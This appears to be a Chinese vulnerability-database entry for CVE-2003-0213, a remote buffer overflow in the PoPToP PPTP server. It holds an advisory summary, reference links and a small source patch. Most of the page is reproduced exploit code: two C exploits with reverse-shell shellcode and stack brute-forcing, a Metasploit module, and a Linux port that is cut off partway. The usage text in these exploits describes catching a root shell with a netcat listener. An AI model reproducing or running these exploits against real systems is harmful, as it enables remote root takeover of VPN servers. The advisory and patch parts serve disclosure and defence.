CVE-2003-0213
CVSS7.5
发布时间 :2003-05-12 00:00:00
修订时间 :2016-10-17 22:30:46
NMCOEPS    

[原文]ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to cause a denial of service via a length field of 0 or 1, which causes a negative value to be fed into a read operation, leading to a buffer overflow.


[CNNVD]PoPToP PPTP read()参数负值远程缓冲区溢出漏洞(CNNVD-200305-036)

        PoPToP PPTP一般用于建立VPN连接,使用在Windows操作系统下。
        PoPToP PPTP在引用用户提供的输入用于各种计算时缺少正确过滤检查,远程攻击者可以利用这个漏洞破坏服务程序进程的敏感内存,可能以PoPToP进程权限在系统上执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:poptop:pptp_server:1.0.1
cpe:/a:poptop:pptp_server:1.1.3_2002-10-09
cpe:/a:poptop:pptp_server:1.1.4b2
cpe:/a:poptop:pptp_server:1.1.4b1
cpe:/a:poptop:pptp_server:1.1.2
cpe:/a:poptop:pptp_server:1.1.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0213
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0213
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-036
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105068728421160&w=2
(UNKNOWN)  BUGTRAQ  20030418 Exploit for PoPToP PPTP server
http://marc.info/?l=bugtraq&m=105154539727967&w=2
(UNKNOWN)  BUGTRAQ  20030428 GLSA: pptpd (200304-08)
http://sourceforge.net/project/shownotes.php?release_id=138437
(UNKNOWN)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=138437
http://www.debian.org/security/2003/dsa-295
(VENDOR_ADVISORY)  DEBIAN  DSA-295
http://www.kb.cert.org/vuls/id/673993
(UNKNOWN)  CERT-VN  VU#673993
http://www.novell.com/linux/security/advisories/2003_029.html
(UNKNOWN)  SUSE  SuSE-SA:2003:029
http://www.securityfocus.com/archive/1/317995
(VENDOR_ADVISORY)  BUGTRAQ  20030409 PoPToP PPTP server remotely exploitable buffer overflow
http://www.securityfocus.com/archive/1/319428
(UNKNOWN)  BUGTRAQ  20030422 Re: Exploit for PoPToP PPTP server - Linux version
http://www.securityfocus.com/bid/7316
(VENDOR_ADVISORY)  BID  7316

- 漏洞信息

PoPToP PPTP read()参数负值远程缓冲区溢出漏洞
高危 边界条件错误
2003-05-12 00:00:00 2012-11-30 00:00:00
远程  
        PoPToP PPTP一般用于建立VPN连接,使用在Windows操作系统下。
        PoPToP PPTP在引用用户提供的输入用于各种计算时缺少正确过滤检查,远程攻击者可以利用这个漏洞破坏服务程序进程的敏感内存,可能以PoPToP进程权限在系统上执行任意指令。

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * Timo Sirainen <tss@iki.fi>提供如下第三方补丁:
        --- ctrlpacket.c.old 1999-12-23 23:43:33.000000000 +0200
        +++ ctrlpacket.c 2003-04-09 18:58:21.000000000 +0300
        @@ -254,8 +254,8 @@
         }
         /* OK, we have (at least) the first 2 bytes, and there is data waiting */
         length = htons(*(u_int16_t *) packet);
        - if (length > PPTP_MAX_CTRL_PCKT_SIZE) {
        - syslog(LOG_ERR, "CTRL: Control packet > PPTP_MAX_CTRL_PCKT_SIZE (length = %d)", length);
        + if (length <= 10 || length > PPTP_MAX_CTRL_PCKT_SIZE) {
        + syslog(LOG_ERR, "CTRL: 11 < Control packet (length=%d) < ", length);
         /* we loose sync (unless we malloc something big, which isn't a good
         * idea - potential DoS) so we must close connection (draft states that
         * if you loose sync you must close the control connection immediately)
        厂商补丁:
        PoPToP
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.poptop.org

- 漏洞信息 (16)

PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (EDBID:16)
linux remote
2003-04-18 Verified
1723 einstein
N/A [点击下载]
/* 
*  exploit for a recently discovered vulnerability in PoPToP
*  PPTP server under Linux. Versions affected are all prior to
*  1.1.4-b3 and 1.1.3-20030409.
*  The exploit is capable of bruteforcing the RET address to find our
*  buffer in the stack. Upon a successfull run it brings up a reverse
*  shell with privileges of the pptpd daemon (typically root)
*  on the victim server.
*/

#include <iostream.h>
#include <winsock.h>
#include <stdio.h>

#define u_int8_t char
#define u_int16_t WORD
#define u_int32_t DWORD


char shellcode[] =

"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b"
"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a"
"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d"

"\x01\x01" // port

"\x54\xd6\x63"

"\x01\x01\x01\x01" // ip address

"\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67"
"\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e"
"\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b"
"\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60"
"\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa"
"\xfd\xbc\xe0\xfb";




struct pptp_header {
        u_int16_t length;               /* pptp message length incl header */
        u_int16_t pptp_type;            /* pptp message type */
        u_int32_t magic;                /* magic cookie */
        u_int16_t ctrl_type;            /* control message type */
        u_int16_t reserved0;            /* reserved */
};

#define MAX_HOSTNAME_SIZE               64
#define MAX_VENDOR_SIZE                 64
#define PPTP_VERSION                    0x0100

struct pptp_start_ctrl_conn_rqst {
        struct pptp_header header;      /* pptp header */
        u_int16_t version;              /* pptp protocol version */
        u_int16_t reserved1;            /* reserved */
        u_int32_t framing_cap;          /* framing capabilities */
        u_int32_t bearer_cap;           /* bearer capabilities */
        u_int16_t max_channels;         /* maximum channels */
        u_int16_t firmware_rev;         /* firmware revision */
        u_int8_t hostname[MAX_HOSTNAME_SIZE];   /* hostname */
        u_int8_t vendor[MAX_VENDOR_SIZE];       /* vendor */
};

struct pptp_echo_rqst {
        struct pptp_header header;      /* header */
        u_int32_t identifier;           /* value to match rply with rqst */
                                char buf[10000];
};

struct pptp_reply {
        struct pptp_header header;      /* header */
                                char buf[10000];
};


/* Magic Cookie */
#define PPTP_MAGIC_COOKIE               0x1a2b3c4d

/* Message types */
#define PPTP_CTRL_MESSAGE               1

/* Control Connection Management */
#define START_CTRL_CONN_RQST            1
#define START_CTRL_CONN_RPLY            2
#define STOP_CTRL_CONN_RQST             3
#define STOP_CTRL_CONN_RPLY             4
#define ECHO_RQST                       5
#define ECHO_RPLY                       6

// brute force values
#define TOPOFSTACK 0xbfffffff
#define BOTTOMOFSTACK 0xbf000000
#define STEP 50

void send_init_request(SOCKET st)
{
        pptp_start_ctrl_conn_rqst request;
  request.header.magic = htonl(PPTP_MAGIC_COOKIE);
  request.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
        request.header.ctrl_type = htons(START_CTRL_CONN_RQST);

  request.version = PPTP_VERSION;
        request.framing_cap = 0;
        request.bearer_cap = 0;
        request.max_channels = 1;
        request.firmware_rev = 0;
  strcpy(request.hostname,"hell");
        strcpy(request.vendor,"domain HELL");
  request.header.length = ntohs(sizeof(request));

        send(st,(char*)&request,sizeof(request),0);

}

void send_ping_overflow(SOCKET st,DWORD ret,char* hostname,short port)
{ 
  pptp_echo_rqst ping;
        ping.header.magic = htonl(PPTP_MAGIC_COOKIE);
  ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
        ping.header.ctrl_type = htons(ECHO_RQST);
        ping.identifier = 111;

        ping.header.length = ntohs(1);
        
  
        strcpy(ping.buf,"");
        
        int buflen = 500;
        for (int i=0;i<buflen;i++)strcat(ping.buf,"\x90");      
        memcpy(ping.buf+364,(char*)&ret,4); 

        // patch shellcode
        // we have a shellcode xored by 0x93.. let's unxor it :)
        for (i=0;i<sizeof(shellcode);i++) shellcode[i] ^= 0x93;

        *(unsigned short int*)(shellcode+43) = htons(port);
        
  *(unsigned long int*)(shellcode+48) = inet_addr(hostname);

        // we leave 100 bytes for NOPs
        memcpy(ping.buf+100,shellcode,sizeof(shellcode));
                
        send(st,(char*)&ping,sizeof(ping.header)+buflen,0);
 
}

SOCKET st;

int connect_server(char* hostname)
{
        st=socket(PF_INET,SOCK_STREAM,0);
        if (st==INVALID_SOCKET) return 0;

        sockaddr_in addr;

        addr.sin_family=AF_INET;
        addr.sin_port=0;
        addr.sin_addr.s_addr=0;
        bind(st, (LPSOCKADDR)&addr,sizeof(addr));
  
        
        addr.sin_family=AF_INET;
        addr.sin_port=htons(1723);
        addr.sin_addr.s_addr=inet_addr(hostname);
        printf("connecting... ");
        if (connect(st,(sockaddr*)&addr,sizeof(addr)) != 0)
        {
                printf("Connect error. GetLastError=%d\n",GetLastError());
                return 0;
        }
        return 1;
}

int main(int argc, char** argv)
{
        printf("\n");
        printf("                   D  H     H                            \n");
        printf("                   D  H     H     T\n");
        printf("                   D  H  H  H     T     EE    AA   M   M \n");
        printf("               DDD D  HHHHHHH     T    E  E  A  A  MM MM \n");
        printf("              D   DD  H  H  H    TTTT  E  E  A  A  MM MM \n");
        printf("             D     D  H     H     T    EEE   AAAA  M M M \n");
        printf("              D    D  H     H     T    E     A  A  M   M \n");
        printf("               DDDD   H     H      TTT  EEE  A  A  M   M   ");
        printf(" ... presents ... \n\n");
  printf("Exploit for PoPToP PPTP server older than \n1.1.4-b3 and 1.1.3-20030409 under Linux.\n");
        printf("by .einstein., April 2003.\n");
        printf("\n");
  if (argc < 2)
  {
                printf("usage: \n");
                printf("  %s <pptp_server> [<your_ip>] [<your_port>] [<timeout>]\n\n",argv[0]);
                printf("    <pptp_server> is the ip address or hostname of the PoPToP server\n");
                printf("      you want to attack.  Port 1723 is used for connection\n");
                printf("    <your_ip> and <your_port> - specify an ip address to which\n");
                printf("      a connection is possible to port <your_port> and set up a\n");
                printf("      netcat listener. You'll get a reverse shell.\n");
                printf("    <timeout> is a delay between stack bruteforce attemts, in milliseconds\n");
                printf("   If you only pass a single parameter, the program will check\n");
                printf("   whether remote server is vulnerable or not. Otherwise it will\n");
                printf("   perform a ret bruteforce.\n");
                printf("usage examples:\n");
                printf("  %s 192.168.1.2 192.168.1.1 5555\n",argv[0]);
                printf("    attack 192.168.1.2 and get a reverse shell on port 5555\n");
          printf("  %s 127.0.0.1 127.0.0.1 6666 100\n",argv[0]);
                printf("    attack a locally running pptpd with a timeout of 100 ms\n");
                printf("    and get a shell on port 6666.\n");
                printf("  %s 192.168.1.56\n",argv[0]);
                printf("    check if the PoPToP server on 192.168.1.56 is vulnerable.\n");
    return 0;
        }


  int timeout = 500;
  if (argc >= 5) timeout = atoi(argv[4]);

        // init winsock
        WORD version=0x0101;
  WSADATA data;
  WSAStartup(version,&data);

        DWORD ret;
        if (argc == 2)
        {
                if (!connect_server(argv[1])) return 1;

                printf("\nChecking if the server is vulnerable..\n");
                printf("(if it is you have to wait 65 seconds)..\n");
                send_init_request(st);

                ret = 0x01010101;
                int bytes;
                pptp_reply reply;
                        
                //header length
                bytes = recv(st,(char*)&reply,2,0);
                bytes = ntohs(reply.header.length);
                bytes = recv(st,(char*)&reply+2,bytes-2,0);
                int j = htons(reply.header.ctrl_type);
                send_ping_overflow(st,ret,"0.0.0.0",0);
                        
                //header length
                bytes = recv(st,(char*)&reply,2,0);
                printf("PoPToP server is ");
                if (bytes != SOCKET_ERROR) printf("vulnerable!\n");
                else printf("not vulnerable\n");
                closesocket(st);

                return 1;
        }

        printf("[!] Attempting bruteforce against %s\n",argv[1]);
        printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3]));
        
        int checked = 0;
        
        for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP)
        {
          printf("[*] ");
                if (!connect_server(argv[1])) return 1;
        printf("[ret=0x%x]..",ret);
        printf("sending payload..");
        
                // initial packet
                send_init_request(st);

                //a real overflowing ping packet
          send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
                closesocket(st);

                Sleep(timeout);
                printf("done\n");
        
                
        
        }
        
        return 0;
}


// milw0rm.com [2003-04-18]
		

- 漏洞信息 (19)

PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c) (EDBID:19)
linux remote
2003-04-25 Verified
1723 blightninjas
N/A [点击下载]
/*
 * Fixed Exploit against PoPToP in Linux (poptop-sane.c)
 * ./r4nc0rwh0r3 of blightninjas (blightninjas@hushmail.com)
 *
 * blightninjas: bringing pain, suffering, and humiliation to the security world
 * Expect more great release like helloworld-annotated.c and
 * cd explained whitepaper, we are working hard in da underground
 *
 * Other Editions Available At:
 *   http://www.freewebs.com/blightninjas/
 *
 *  *** Bugtraq Clean Edition ***
 * Based off of code by einstein_dhtm@front.ru
 * 
 * Notes on the exploit:
 * This was only tested under slackware, RET_OFF could possibly
 * be different.
 * You can have nulls in the shellcode (the hole is in a read())
 * This allows you to have ips and ports with nulls in them
 * 
 * Shouts to ADM, TESO, and all the other "cool" groups that never give us 0day
 *
 * Examples:
 * attack target 1
 * nc -v -l -p 10000 <-- on 1.1.1.2
 * ./poptop-sane 1.1.1.1 1.1.1.2 10000 -t 1
 * don't come to use, we come to you.
 *
 * ./poptop-sane 1.1.1.1 1.1.1.2 10000 -t
 * list targets
 *
 * ./poptop-sane 1.1.1.1 1.1.1.2 10000 -r 0xbffff600
 * attack using ret address 0xbffff600
 *
 * I think you get the point
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>

#define NOP_LENGTH 140
// I calculate at 336, I'll fudge to make more general
#define RET_OFF 320
#define MAX_HOSTNAME_SIZE               64
#define MAX_VENDOR_SIZE                 64
#define PPTP_VERSION                    0x0100
/* Magic Cookie */
#define PPTP_MAGIC_COOKIE               0x1a2b3c4d

/* Message types */
#define PPTP_CTRL_MESSAGE               1

/* Control Connection Management */
#define START_CTRL_CONN_RQST            1
#define START_CTRL_CONN_RPLY            2
#define STOP_CTRL_CONN_RQST             3
#define STOP_CTRL_CONN_RPLY             4
#define ECHO_RQST                       5
#define ECHO_RPLY                       6

// brute force values
// Values can be increased both ways
#define TOPOFSTACK 0xbffff800
#define BOTTOMOFSTACK 0xbffff000
#define STEP 64

/* esdee I love you, call me sometime */
char
shellcode[] = 
  "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
  "\x06\x51\xb1\x01\x51\xb1\x02\x51"
  "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
  "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
  "\x68\x41\x42\x43\x44\x66\x68\xb0"
  "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
  "\x10\x53\x57\x52\x89\xe1\xb3\x03"
  "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
  "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
  "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
  "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
  "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
  "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
  "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
  "\x2f\x62\x69\x89\xe3\x50\x53\x89"
  "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
  "\x01\xcd\x80";

int st;
struct target {
  char *desc;
  u_int32_t ret;
} targets[] =
{
  {"Slackware 8.0 Linux 2.4.18 pptpd-1.0.1", 0xbffff540},
  {"Slackware 8.0 Linux 2.4.18 pptpd-1.1.3", 0xbffff580},
};
  
struct pptp_header {
  u_int16_t length;               /* pptp message length incl header */
  u_int16_t pptp_type;            /* pptp message type */
  u_int32_t magic;                /* magic cookie */
  u_int16_t ctrl_type;            /* control message type */
  u_int16_t reserved0;            /* reserved */
};

struct pptp_start_ctrl_conn_rqst {
  struct pptp_header header;      /* pptp header */
  u_int16_t version;              /* pptp protocol version */
  u_int16_t reserved1;            /* reserved */
  u_int32_t framing_cap;          /* framing capabilities */
  u_int32_t bearer_cap;           /* bearer capabilities */
  u_int16_t max_channels;         /* maximum channels */
  u_int16_t firmware_rev;         /* firmware revision */
  u_int8_t hostname[MAX_HOSTNAME_SIZE];   /* hostname */
  u_int8_t vendor[MAX_VENDOR_SIZE];       /* vendor */
};

struct pptp_echo_rqst {
  struct pptp_header header;      /* header */
  u_int32_t identifier;           /* value to match rply with rqst */
  char buf[10000];
};

struct pptp_reply {
  struct pptp_header header;      /* header */
  char buf[10000];
};

void catch_pipe() {
  printf("Broken pipe caught, server most likely patched.\n");
  exit(1);
}
void send_init_request(int st)
{
  struct pptp_start_ctrl_conn_rqst request;
  request.header.magic = htonl(PPTP_MAGIC_COOKIE);
  request.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
  request.header.ctrl_type = htons(START_CTRL_CONN_RQST);
  
  request.version = PPTP_VERSION;
  request.framing_cap = 0;
  request.bearer_cap = 0;
  request.max_channels = 1;
  request.firmware_rev = 0;
  strcpy(request.hostname,"hell");
  strcpy(request.vendor,"domain HELL");
  request.header.length = ntohs(sizeof(request));
  
  send(st,(char*)&request,sizeof(request),0);
}

void send_ping_overflow(int st, u_int32_t ret, char *hostname, short port)
{ 
  struct pptp_echo_rqst ping;
  int i, buflen = 500;

  ping.header.magic = htonl(PPTP_MAGIC_COOKIE);
  ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
  ping.header.ctrl_type = htons(ECHO_RQST);
  ping.identifier = 111;  
  ping.header.length = ntohs(1);

  for (i = 0; i < NOP_LENGTH; i++) ping.buf[i] = '\x90';      

  *(unsigned long int*)(shellcode+33) = inet_addr(hostname);
  *(unsigned short int*)(shellcode+39) = htons(port);

  memcpy(ping.buf+NOP_LENGTH,shellcode,sizeof(shellcode));
  for(i = RET_OFF; i < buflen - 4; i+=4)
    memcpy(ping.buf+i,(char*)&ret,4); 

  send(st,(char*)&ping,sizeof(ping.header)+buflen,0); 
}

int connect_server(char* hostname)
{
  struct sockaddr_in addr;
  st=socket(PF_INET,SOCK_STREAM,0);
  if ((st=socket(PF_INET,SOCK_STREAM,0)) == -1) return 0;

  addr.sin_family=AF_INET;
  addr.sin_port=0;
  addr.sin_addr.s_addr=0;
  bind(st, (struct sockaddr *)&addr,sizeof(struct sockaddr));
  
  addr.sin_family=AF_INET;
  addr.sin_port=htons(1723);
  addr.sin_addr.s_addr=inet_addr(hostname);
  printf("connecting... ");
  if ((connect(st,(struct sockaddr*)&addr,sizeof(addr))) != 0)
  {
    perror("connect");
    return 0;
  }
  return 1;
}

int main(int argc, char** argv)
{
  struct pptp_reply reply;
  // rushing things only makes it worse
  int timeout = 1000;
  u_int32_t ret;
  int bytes, j, checked = 0;
  signal(SIGPIPE, catch_pipe);
  printf("\n");
  // Sorry, I failed REALLY FUCKING LAME ASCII ART class
  printf("        D     A     SSSSS                           \n");
  printf("        D    A A    S     SSSSS     T\n");
  printf("        D   A   A   S     S         T     EE    AA   M   M \n");
  printf("    DDD D  AAAAAAA  SSSSS S         T    E  E  A  A  MM MM \n");
  printf("   D   DD  A     A      S SSSSS    TTTT  E  E  A  A  MM MM \n");
  printf("  D     D  A     A      S     S     T    EEE   AAAA  M M M \n");
  printf("   D    D  A     A  SSSSS     S     T    E     A  A  M   M \n");
  printf("    DDDD   A     A        SSSSS      TTT  EEE  A  A  M   M   ");
  printf(" ... presents ... \n\n");                
  printf("Exploit for PoPToP PPTP server older than\n1.1.4-b3 and 1.1.3-20030409 under Linux.\n");
  printf("by .einstein., April 2003.  <-- the genius\n\n");
  printf("fixed by ./r4nc0rwh0r3 of blightninjas  blightninjas@hushmail.com\n\n");
  if (argc < 2)
  {
    printf("usage: \n");
    printf("  %s <pptp_server> [your_ip] [your_port] ...\n",argv[0]);
    printf("   -b [timeout in ms]\n");
    printf("   -t [target]\n");
    printf("   -r [ret address]\n");
    //Abridged edition 
    printf(" Only supply pptp_server to test exploitability using really poor method.\n");
    printf(" Connect back to your_ip at your_port.\n\n");
    return 0;
  }

  if (argc == 2)
  {
    if (!connect_server(argv[1])) return 1;
  
    printf("\nChecking if the server is vulnerable..\n");
    printf("(if it is you have to wait 65 seconds)..\n");
    send_init_request(st);
  
    ret = 0x01010101;
  
    //header length
    bytes = recv(st,(char*)&reply,2,0);
    bytes = ntohs(reply.header.length);
    bytes = recv(st,(char*)&reply+2,bytes-2,0);
    j = htons(reply.header.ctrl_type);
    send_ping_overflow(st,ret,"0.0.0.0",0);
  
    //header length
    bytes = recv(st,(char*)&reply,2,0);
    printf("PoPToP server is ");
    if ((bytes = recv(st,(char*)&reply,2,0)) != -1) printf("vulnerable!\n");
    else printf("not vulnerable\n");
    close(st);
  
    return 1;
  }
  if(argc < 5) exit(1);
  else if(strncmp(argv[4], "-b", 2) == 0) {
    if(argc == 6) timeout = atoi(argv[5]);
    printf("[!] Attempting bruteforce against %s, timeout: %d\n", argv[1], timeout);
    printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3]));

    for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP) {
      printf("[*] ");
      if (!connect_server(argv[1])) return 1;
      printf("[ret=0x%x]..",ret);
      printf("sending payload..");

      // initial packet
      send_init_request(st);

      //a real overflowing ping packet
      send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
      close(st);

      usleep(timeout * 1000);
      printf("done\n");
    }
  }
  else if(strncmp(argv[4], "-t", 2) == 0) {
    if(argc == 6 && atoi(argv[5]) >= 0
     && atoi(argv[5]) < sizeof(targets)/sizeof(struct target)) {
      ret = targets[atoi(argv[5])].ret;
      printf("[!] Attacking %s using %s\n", argv[1], targets[atoi(argv[5])].desc);

      printf("[*] ");
      if (!connect_server(argv[1])) return 1;
      printf("[ret=0x%x]..",ret);
      printf("sending payload..");

      // initial packet
      send_init_request(st);

      //a real overflowing ping packet
      send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
      close(st);

      printf("done\n");
    }
    else {
      for(j = 0; j < sizeof(targets)/sizeof(struct target); j++) {
        printf("%02d - %s\n", j, targets[j].desc);
      }
      printf("\n");
    }
  }
  else if(strncmp(argv[4], "-r", 2) == 0) {
    if(argc == 6) {
      sscanf(argv[5], "%x", (unsigned int *)&ret);
      printf("[!] Attacking %s\n", argv[1]);

      printf("[*] ");
      if (!connect_server(argv[1])) return 1;
      printf("[ret=0x%x]..",ret);
      printf("sending payload..");

      // initial packet
      send_init_request(st);

      //a real overflowing ping packet
      send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
      close(st);

      printf("done\n");
    }
  }
  return 0;
}

// milw0rm.com [2003-04-25]
		

- 漏洞信息 (16845)

Poptop Negative Read Overflow (EDBID:16845)
linux remote
2010-11-23 Verified
0 metasploit
N/A [点击下载]
##
# $Id: poptop_negative_read.rb 11114 2010-11-23 18:12:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Poptop Negative Read Overflow',
			'Description'    => %q{
					This is an exploit for the Poptop negative read overflow.  This will
				work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
				currently do not have a good way to detect Poptop versions.

				The server will by default only allow 4 concurrent manager processes
				(what we run our code in), so you could have a max of 4 shells at once.

				Using the current method of exploitation, our socket will be closed
				before we have the ability to run code, preventing the use of Findsock.
			},
			'Author'         => 'spoonm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11114 $',
			'References'     =>
				[
					['CVE', '2003-0213'],
					['OSVDB', '3293'],
					['URL',   'http://securityfocus.com/archive/1/317995'],
					['URL',   'http://www.freewebs.com/blightninjas/'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					# Payload space is dynamically determined
					'MinNops'         => 16,
					'StackAdjustment' => -1088,
					'Compat'          =>
						{
							'ConnectionType' => '-find',
						}
				},
			'SaveRegisters'  => [ 'esp' ],
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Targets'        =>
				[
					['Linux Bruteforce',
						{ 'Bruteforce' =>
							{
								'Start'  => { 'Ret' => 0xbffffa00 },
								'Stop'   => { 'Ret' => 0xbffff000 },
								'Step'   => 0
							}
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 9 2003'))

		register_options(
			[
				Opt::RPORT(1723)
			], self.class)

		register_advanced_options(
			[
				OptInt.new("PreReturnLength", [ true, "Space before we hit the return address.  Affects PayloadSpace.", 220 ]),
				OptInt.new("RetLength",       [ true, "Length of returns after payload.", 32 ]),
				OptInt.new("ExtraSpace",      [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows).  I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
				OptString.new("Hostname",     [ false, "PPTP Packet hostname", '' ]),
				OptString.new("Vendor",       [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
			], self.class)
	end

	# Dynamic payload space calculation
	def payload_space(explicit_target = nil)
		datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
	end

	def build_packet(length)
		[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
			[1,0].pack('cc') +
			[0].pack('n') +
			[1,1,0,2600].pack('NNnn') +
			datastore['Hostname'].ljust(64, "\x00") +
			datastore['Vendor'].ljust(64, "\x00")
	end

	def check
		connect
		sock.put(build_packet(156))
		res = sock.get_once

		if res and res =~ /MoretonBay/
			return CheckCode::Detected
		end

		return CheckCode::Safe
	end

	def brute_exploit(addrs)
		connect

		print_status("Trying #{"%.8x" % addrs['Ret']}...")

		# Construct the evil length packet
		packet =
			build_packet(1) +
			payload.encoded +
			([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))

		sock.put(packet)

		handler
		disconnect
	end

end
		

- 漏洞信息 (22479)

PoPToP PPTP 1.0/1.1.x Negative read() Argument Remote Buffer Overflow Vulnerability (EDBID:22479)
linux remote
2003-04-09 Verified
0 John Leach
N/A [点击下载]
source: http://www.securityfocus.com/bid/7316/info

A buffer-overflow vulnerability has been discovered in PoPToP PPTP. The problem occurs because the software fails to do sufficient sanity checks when referencing user-supplied input used in various calculations. As a result, an attacker may be able to trigger a condition that would corrupt sensitive memory.

Successful exploits of this issue may allow attackers to execute arbitrary code with the privileges of the affected server. 

#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <netinet/in.h>
#include <errno.h>

/* Ported to Linux by John Leach <john@johnleach.nospam.co.uk> */

typedef int SOCKET;
typedef unsigned short WORD;
typedef unsigned int DWORD;


char shellcode[] =

"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b"
"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a"
"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d"

"\x01\x01" // port

"\x54\xd6\x63"

"\x01\x01\x01\x01" // ip address

"\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67"
"\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e"
"\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b"
"\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60"
"\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa"
"\xfd\xbc\xe0\xfb";




struct pptp_header {
        u_int16_t length;               /* pptp message length incl header */
        u_int16_t pptp_type;            /* pptp message type */
        u_int32_t magic;                /* magic cookie */
        u_int16_t ctrl_type;            /* control message type */
        u_int16_t reserved0;            /* reserved */
};

#define MAX_HOSTNAME_SIZE               64
#define MAX_VENDOR_SIZE                 64
#define PPTP_VERSION                    0x0100

struct pptp_start_ctrl_conn_rqst {
        struct pptp_header header;      /* pptp header */
        u_int16_t version;              /* pptp protocol version */
        u_int16_t reserved1;            /* reserved */
        u_int32_t framing_cap;          /* framing capabilities */
        u_int32_t bearer_cap;           /* bearer capabilities */
        u_int16_t max_channels;         /* maximum channels */
        u_int16_t firmware_rev;         /* firmware revision */
        u_int8_t hostname[MAX_HOSTNAME_SIZE];   /* hostname */
        u_int8_t vendor[MAX_VENDOR_SIZE];       /* vendor */
};

struct pptp_echo_rqst {
        struct pptp_header header;      /* header */
        u_int32_t identifier;           /* value to match rply with rqst */
                                char buf[10000];
};

